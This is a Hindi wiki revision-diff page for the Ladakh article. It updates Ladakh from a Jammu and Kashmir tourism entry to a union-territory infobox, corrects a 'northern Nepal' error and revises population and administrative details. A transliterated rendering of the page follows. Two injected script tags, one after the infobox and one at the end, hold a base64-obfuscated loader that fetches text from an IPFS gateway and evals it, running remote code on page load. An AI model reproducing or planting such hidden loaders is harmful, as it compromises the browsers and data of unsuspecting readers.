Difference between revisions of "लद्दाख"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{सूचना बक्सा पर्यटन
+
{{सूचना बक्सा राज्य
|चित्र=Tso-Moriri-Lake-Ladakh.jpg
+
|Image=Tso-Moriri-Lake-Ladakh.jpg
|चित्र का नाम=लद्दाख
+
|स्थानीय भाषाओं में नाम=
|विवरण=लद्दाख उत्तरी नेपाल के [[जम्मू और कश्मीर]] प्रान्त में एक धरातल है, जो उत्तर में काराकोरम पर्वत और दक्षिण में हिमालय पर्वत के बीच में है।
+
|राजधानी=[[लेह]]
|राज्य=[[जम्मू कश्मीर]]
+
|राजभाषा(एँ)=तिब्बती, लद्दाख़ी, [[हिन्दी]] (आधिकारिक)
|केन्द्र शासित प्रदेश=
 
|ज़िला=
 
|निर्माता=
 
|स्वामित्व=
 
|प्रबंधक=
 
|निर्माण काल=
 
 
|स्थापना=
 
|स्थापना=
|भौगोलिक स्थिति=34° 10′ 12″ उत्तर, 77° 34′ 48″ पूर्व 
+
|जनसंख्या=2,74,289 ([[2011]])
|मार्ग स्थिति=
+
|जनसंख्या घनत्व=4.6 कि.मी.<sup>2</sup> (12 वर्गमील)
|प्रसिद्धि=[[शंकर गोम्पा]], हेमिस मठ, त्सो मोरीरी और [[थिक्सी गोम्पा]] प्रमुख आकर्षण के केंद्र 
+
|क्षेत्रफल=59146 कि.मी.<sup>2</sup> (22,836 वर्गमील)
|कब जाएँ=[[मई]] से [[सितम्बर]] के मध्य 
+
|भौगोलिक निर्देशांक=
|कैसे पहुँचें=हवाई जहाज़, रेल, बस तथा जीप द्वारा 
+
|जलवायु=
|हवाई अड्डा=लेह कुशोक बकुला रिम्पोची हवाई अड्डा
+
|तापमान=
|रेलवे स्टेशन=जम्मू तवी रेलवे स्टेशन
+
|ग्रीष्म=
|बस अड्डा=
+
|शरद=
|यातायात=हवाई जहाज़, रेल, बस तथा टैक्सी
+
|वर्षा=
|क्या देखें=[[लेह महल]], [[शंकर गोम्पा]], [[अलची गोम्पा]], [[थिक्सी गोम्पा]] और [[शांति स्तूप]]
+
|मंडल=
|कहाँ ठहरें=होटल, गेस्ट हाउस
+
|ज़िले=02
|क्या खायें=
+
|सबसे बड़ा नगर=
|क्या ख़रीदें=
+
|महानगर=
|एस.टी.डी. कोड=
+
|बड़े नगर=
|ए.टी.एम=
+
|मुख्य ऐतिहासिक स्थल=
|सावधानी=
+
|मुख्य पर्यटन स्थल=
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Kargil/The+Ladakh+Marathon+Hub,+Hotel+Kanglhachen+Complex,+Opposite+to+Police+Station+%26+Chief+Medical+Officer%E2%80%99s+office,+Ladakh,+Leh,+Jammu+and+Kashmir+194101/@34.0046662,76.5858338,8.25z/data=!4m13!4m12!1m5!1m1!1s0x38e323b1c052debb:0xa73f2023eb4fccae!2m2!1d76.1348944!2d34.5538522!1m5!1m1!1s0x38fdeb3e30f030b3:0x7fb40a5319ce3121!2m2!1d77.5839305!2d34.1667175?hl=en गूगल मानचित्र लद्दाख]
+
|मुख्य धर्म-सम्प्रदाय=
|संबंधित लेख=
+
|लिंग अनुपात=
|शीर्षक 1=भाषा
+
|साक्षरता=
|पाठ 1=[[उर्दू]], लद्दाखी, तिब्बती, बाल्ती   
+
|स्त्री=
|शीर्षक 2=कुल जनसंख्या
+
|पुरुष=
|पाठ 2=2,70,126 (2001)
+
|उच्च न्यायालय=जम्मू और कश्मीर उच्च न्यायालय
|अन्य जानकारी=लद्दाख में कश्मीरी बकरियों का पालन होता है, जिससे पश्मीना मिलता है और यह बढ़िया क़िस्म के शाल आदि वस्त्र बनाने के काम आता है।
+
|राज्यपाल=
 +
|उपराज्यपाल=राधाकृष्ण माथुर
 +
|प्रशासक=
 +
|मुख्यमंत्री=
 +
|उपमुख्यमंत्री=
 +
|नेता विरोधी दल=
 +
|विधान सभा सदस्य संख्या=
 +
|विधान परिषद सदस्य संख्या=
 +
|लोकसभा क्षेत्र=
 +
|राज्यसभा सदस्य=
 +
|न्यायपालिका=
 +
|राजकीय पशु=
 +
|राजकीय पक्षी=
 +
|राजकीय पुष्प=
 +
|राजकीय वृक्ष=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|शीर्षक 3=वाहन पंजीकरण
 +
|पाठ 3=टीबीए (TBA)
 +
|अन्य जानकारी=
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 +
|emblem=Blank-1.gif
 
}}
 
}}
 +
'''लद्दाख''' [[उत्तरी भारत]] का एक केन्द्र शासित प्रदेश है, जो उत्तर में [[कराकोरम पर्वत श्रेणी|काराकोरम पर्वत]] और दक्षिण में [[हिमालय|हिमालय पर्वत]] के बीच में स्थित है। यह [[भारत]] के सबसे विरल जनसंख्या वाले भागों में से एक है।
  
 
+
*वृहद [[हिमालय]] पर्वत [[नृजातीय]], सांस्कृतिक और भौतिक दृष्टि से एक विशाल विभाजक है, जो पूर्वोत्तर की ओर कम जनसंख्या वाले राज्य लद्दाख (जिसे कभी - कभी 'छोटी तिब्बत' भी कहते हैं) को बाँटता है।  
'''लद्दाख''' उत्तरी नेपाल के [[जम्मू और कश्मीर]] प्रान्त में एक धरातल है, जो उत्तर में काराकोरम पर्वत और दक्षिण में हिमालय पर्वत के बीच में है। यह नेपाल के सबसे विरल जनसंख्या वाले भागों में से एक है।
+
*पूर्व में [[लेह]] के आसापास के निवासी मुख्यतः तिब्बती पूर्वजों और भाषा (लद्दीखी) वाले [[बौद्ध]] हैं, लेकिन पश्चिम में [[कारगिल]] के आसपास जनसंख्या मुख्यतः मुस्लिम है और इस्लाम की शिया शाखा की है।
 
 
*वृहद [[हिमालय]] पर्वत [[नृजातीय]], सांस्कृतिक और भौतिक दृष्टि से एक विशाल विभाजक है, जो पूर्वोत्तर की ओर कम जनसंख्या वाले क्षेत्र लद्दाख (जिसे कभी - कभी 'छोटी तिब्बत' भी कहते हैं) को बाँटता है।  
 
*पूर्व में लेह के आसापास के निवासी मुख्यतः तिब्बती पूर्वजों और भाषा (लद्दीखी) वाले [[बौद्ध]] हैं। लेकिन पश्चिम में [[कारगिल]] के आसपास जनसंख्या मुख्यतः मुस्लिम है और इस्लाम की शिया शाखा की है।
 
 
*लद्दाख में खेती सिंधु, श्योक और सुरु नदियों की घाटियों जैसी कुछ मुख्य घाटियों में ही सीमित है।  
 
*लद्दाख में खेती सिंधु, श्योक और सुरु नदियों की घाटियों जैसी कुछ मुख्य घाटियों में ही सीमित है।  
 
*यहाँ पर छोटे - छोटे सिंचित भूखंडों में जौ, कुटु, शलजम और सरसों की खेती की जाती है।  
 
*यहाँ पर छोटे - छोटे सिंचित भूखंडों में जौ, कुटु, शलजम और सरसों की खेती की जाती है।  
*1970 में कृषि वैज्ञानिकों द्वारा परिचित कराए गए पौधों के कारण कई बाग़ और सब्ज़ियों के खेत पनप गए हैं।  
+
*[[1970]] में कृषि वैज्ञानिकों द्वारा परिचित कराए गए पौधों के कारण कई बाग़ और सब्ज़ियों के खेत अब लद्दाख में पनप गए हैं।  
 
*चरागाहों में याक का पालन प्रोत्साहित किया जा रहा है।
 
*चरागाहों में याक का पालन प्रोत्साहित किया जा रहा है।
*इस क्षेत्र में कश्मीरी बकरियों का पालन होता है, जिससे पश्मीना मिलता है और यह बढ़िया क़िस्म के शाल आदि वस्त्र बनाने के काम आता है।  
+
*लद्दाख में कश्मीरी बकरियों का पालन होता है, जिससे पश्मीना मिलता है और यह बढ़िया क़िस्म के शाल आदि वस्त्र बनाने के काम आता है।  
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==वीथिका==
 
==वीथिका==
 
<gallery>
 
<gallery>
Line 67: Line 74:
 
चित्र:Tso-Moriri-Ladakh.jpg|त्सो मोरीरी झील, लद्दाख
 
चित्र:Tso-Moriri-Ladakh.jpg|त्सो मोरीरी झील, लद्दाख
 
</gallery>
 
</gallery>
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{जम्मू और कश्मीर के पर्यटन स्थल}}{{जम्मू और कश्मीर के नगर}}
+
{{राज्य और के. शा. प्र.}}{{भारत गणराज्य}}{{राज्य और के. शा. प्र.2}}
[[Category:जम्मू_और_कश्मीर]]
+
[[Category:भारत के राज्य और केन्द्र शासित प्रदेश]][[Category:राज्य संरचना]][[Category:लद्दाख]]
[[Category:जम्मू_और_कश्मीर_के_नगर]]
+
[[Category:उत्तर भारत]]
[[Category:भारत के नगर]]
+
[[Category:चुनाव अद्यतन]]
 
__INDEX__
 
__INDEX__

Revision as of 11:57, 9 January 2020

laddakh
rajadhani leh
rajabhasha(ean) tibbati, laddakhi, hindi (adhikarik)
janasankhya 2,74,289 (2011)
· ghanatv 4.6 ki.mi.2 (12 vargamil) /varg kimi
kshetraphal 59146 ki.mi.2 (22,836 vargamil)
zile 02
uchch nyayalay jammoo aur kashmir uchch nyayalay
uparajyapal radhakrishna mathur
vahan panjikaran tibie (TBA)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

laddakh uttari bharat ka ek kendr shasit pradesh hai, jo uttar mean karakoram parvat aur dakshin mean himalay parvat ke bich mean sthit hai. yah bharat ke sabase viral janasankhya vale bhagoan mean se ek hai.

  • vrihad himalay parvat nrijatiy, saanskritik aur bhautik drishti se ek vishal vibhajak hai, jo poorvottar ki or kam janasankhya vale rajy laddakh (jise kabhi - kabhi 'chhoti tibbat' bhi kahate haian) ko baantata hai.
  • poorv mean leh ke asapas ke nivasi mukhyatah tibbati poorvajoan aur bhasha (laddikhi) vale bauddh haian, lekin pashchim mean karagil ke asapas janasankhya mukhyatah muslim hai aur islam ki shiya shakha ki hai.
  • laddakh mean kheti siandhu, shyok aur suru nadiyoan ki ghatiyoan jaisi kuchh mukhy ghatiyoan mean hi simit hai.
  • yahaan par chhote - chhote sianchit bhookhandoan mean jau, kutu, shalajam aur sarasoan ki kheti ki jati hai.
  • 1970 mean krishi vaijnanikoan dvara parichit karae ge paudhoan ke karan kee bag aur sabziyoan ke khet ab laddakh mean panap ge haian.
  • charagahoan mean yak ka palan protsahit kiya ja raha hai.
  • laddakh mean kashmiri bakariyoan ka palan hota hai, jisase pashmina milata hai aur yah badhiya qism ke shal adi vastr banane ke kam ata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>